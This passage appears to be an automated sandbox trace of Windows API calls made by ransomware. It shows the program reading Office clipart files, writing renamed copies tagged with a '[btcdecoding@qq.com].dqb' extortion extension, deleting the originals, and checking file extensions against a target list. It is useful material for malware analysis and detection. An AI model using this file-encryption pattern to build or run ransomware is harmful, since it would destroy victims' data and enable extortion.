(lpString1=".zip", lpString2=".WMF") returned 1 [0051.248] lstrlenW (lpString=".rar") returned 4 [0051.248] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.248] lstrlenW (lpString=".bz2") returned 4 [0051.248] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.248] lstrlenW (lpString=".7z") returned 3 [0051.248] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0051.248] lstrlenW (lpString=".dbf") returned 4 [0051.248] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0051.248] lstrlenW (lpString=".1cd") returned 4 [0051.248] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0051.248] lstrlenW (lpString=".jpg") returned 4 [0051.248] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.249] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=2108) returned 1 [0051.249] CloseHandle (hObject=0x214) returned 1 [0051.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf")) returned 0x20 [0051.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0051.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0051.250] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.250] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0051.250] GetLastError () returned 0x0 [0051.250] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x83c, lpOverlapped=0x0) returned 1 [0051.251] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x840, lpOverlapped=0x0) returned 1 [0051.252] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.252] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.252] SetEndOfFile (hFile=0x184) returned 1 [0051.252] CloseHandle (hObject=0x184) returned 1 [0051.252] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.252] SetEndOfFile (hFile=0x214) returned 1 [0051.253] CloseHandle (hObject=0x214) returned 1 [0051.253] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.254] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf")) returned 1 [0051.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0051.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0051.254] lstrlenW (lpString=".doc") returned 4 [0051.254] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.254] lstrlenW (lpString=".docx") returned 5 [0051.254] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.254] lstrlenW (lpString=".pdf") returned 4 [0051.254] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.254] lstrlenW (lpString=".xls") returned 4 [0051.254] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.254] lstrlenW (lpString=".xlsx") returned 5 [0051.254] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.254] lstrlenW (lpString=".ppt") returned 4 [0051.254] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0051.254] lstrlenW (lpString=".zip") returned 4 [0051.254] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.254] lstrlenW (lpString=".rar") returned 4 [0051.254] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.254] lstrlenW (lpString=".bz2") returned 4 [0051.254] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.254] lstrlenW (lpString=".7z") returned 3 [0051.254] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0051.254] lstrlenW (lpString=".dbf") returned 4 [0051.254] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0051.255] lstrlenW (lpString=".1cd") returned 4 [0051.255] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0051.255] lstrlenW (lpString=".jpg") returned 4 [0051.255] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.255] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.255] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0051.255] GetLastError () returned 0x0 [0051.255] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x2418, lpOverlapped=0x0) returned 1 [0051.257] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x2420, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x2420, lpOverlapped=0x0) returned 1 [0051.258] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.258] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.258] SetEndOfFile (hFile=0x184) returned 1 [0051.258] CloseHandle (hObject=0x184) returned 1 [0051.258] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.258] SetEndOfFile (hFile=0x214) returned 1 [0051.259] CloseHandle (hObject=0x214) returned 1 [0051.259] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.259] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf")) returned 1 [0051.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0051.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0051.260] lstrlenW (lpString=".doc") returned 4 [0051.260] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.260] lstrlenW (lpString=".docx") returned 5 [0051.260] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.260] lstrlenW (lpString=".pdf") returned 4 [0051.260] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.260] lstrlenW (lpString=".xls") returned 4 [0051.260] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.260] lstrlenW (lpString=".xlsx") returned 5 [0051.260] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.260] lstrlenW (lpString=".ppt") returned 4 [0051.260] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0051.260] lstrlenW (lpString=".zip") returned 4 [0051.260] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.260] lstrlenW (lpString=".rar") returned 4 [0051.260] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.260] lstrlenW (lpString=".bz2") returned 4 [0051.260] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.260] lstrlenW (lpString=".7z") returned 3 [0051.260] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0051.260] lstrlenW (lpString=".dbf") returned 4 [0051.260] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0051.260] lstrlenW (lpString=".1cd") returned 4 [0051.260] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0051.261] lstrlenW (lpString=".jpg") returned 4 [0051.261] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.261] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=2344) returned 1 [0051.261] CloseHandle (hObject=0x214) returned 1 [0051.261] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf")) returned 0x20 [0051.261] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0051.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0051.261] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.261] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0051.262] GetLastError () returned 0x0 [0051.262] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x928, lpOverlapped=0x0) returned 1 [0051.263] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x930, lpOverlapped=0x0) returned 1 [0051.264] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.264] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.264] SetEndOfFile (hFile=0x184) returned 1 [0051.264] CloseHandle (hObject=0x184) returned 1 [0051.264] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.264] SetEndOfFile (hFile=0x214) returned 1 [0051.265] CloseHandle (hObject=0x214) returned 1 [0051.265] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.265] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf")) returned 1 [0051.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0051.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0051.265] lstrlenW (lpString=".doc") returned 4 [0051.265] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.265] lstrlenW (lpString=".docx") returned 5 [0051.266] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.266] lstrlenW (lpString=".pdf") returned 4 [0051.266] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.266] lstrlenW (lpString=".xls") returned 4 [0051.266] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.266] lstrlenW (lpString=".xlsx") returned 5 [0051.266] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.266] lstrlenW (lpString=".ppt") returned 4 [0051.266] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0051.266] lstrlenW (lpString=".zip") returned 4 [0051.266] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.266] lstrlenW (lpString=".rar") returned 4 [0051.266] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.266] lstrlenW (lpString=".bz2") returned 4 [0051.266] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.266] lstrlenW (lpString=".7z") returned 3 [0051.266] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0051.266] lstrlenW (lpString=".dbf") returned 4 [0051.266] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0051.266] lstrlenW (lpString=".1cd") returned 4 [0051.266] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0051.266] lstrlenW (lpString=".jpg") returned 4 [0051.266] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.266] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.267] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0051.267] GetLastError () returned 0x0 [0051.267] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x17ac, lpOverlapped=0x0) returned 1 [0051.268] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x17b0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x17b0, lpOverlapped=0x0) returned 1 [0051.269] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.269] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.270] SetEndOfFile (hFile=0x184) returned 1 [0051.270] CloseHandle (hObject=0x184) returned 1 [0051.270] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.270] SetEndOfFile (hFile=0x214) returned 1 [0051.271] CloseHandle (hObject=0x214) returned 1 [0051.271] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.271] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf")) returned 1 [0051.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0051.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0051.271] lstrlenW (lpString=".doc") returned 4 [0051.271] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.271] lstrlenW (lpString=".docx") returned 5 [0051.271] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.271] lstrlenW (lpString=".pdf") returned 4 [0051.271] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.271] lstrlenW (lpString=".xls") returned 4 [0051.271] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.271] lstrlenW (lpString=".xlsx") returned 5 [0051.271] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.272] lstrlenW (lpString=".ppt") returned 4 [0051.272] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0051.272] lstrlenW (lpString=".zip") returned 4 [0051.272] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.272] lstrlenW (lpString=".rar") returned 4 [0051.272] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.272] lstrlenW (lpString=".bz2") returned 4 [0051.272] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.272] lstrlenW (lpString=".7z") returned 3 [0051.272] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0051.272] lstrlenW (lpString=".dbf") returned 4 [0051.272] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0051.272] lstrlenW (lpString=".1cd") returned 4 [0051.272] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0051.272] lstrlenW (lpString=".jpg") returned 4 [0051.272] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.272] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.272] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.272] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0051.273] GetLastError () returned 0x0 [0051.273] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xd58, lpOverlapped=0x0) returned 1 [0051.603] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xd60, lpOverlapped=0x0) returned 1 [0051.604] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.604] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.604] SetEndOfFile (hFile=0x184) returned 1 [0052.393] CloseHandle (hObject=0x184) returned 1 [0052.393] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.393] SetEndOfFile (hFile=0x214) returned 1 [0052.394] CloseHandle (hObject=0x214) returned 1 [0052.394] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0052.394] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf")) returned 1 [0052.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0052.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0052.565] lstrlenW (lpString=".doc") returned 4 [0052.565] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.565] lstrlenW (lpString=".docx") returned 5 [0052.565] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.565] lstrlenW (lpString=".pdf") returned 4 [0052.565] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.565] lstrlenW (lpString=".xls") returned 4 [0052.565] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.565] lstrlenW (lpString=".xlsx") returned 5 [0052.565] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.565] lstrlenW (lpString=".ppt") returned 4 [0052.565] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0052.565] lstrlenW (lpString=".zip") returned 4 [0052.565] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.565] lstrlenW (lpString=".rar") returned 4 [0052.565] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.565] lstrlenW (lpString=".bz2") returned 4 [0052.565] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.565] lstrlenW (lpString=".7z") returned 3 [0052.565] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.565] lstrlenW (lpString="C:\\Program Files\\Microsoft 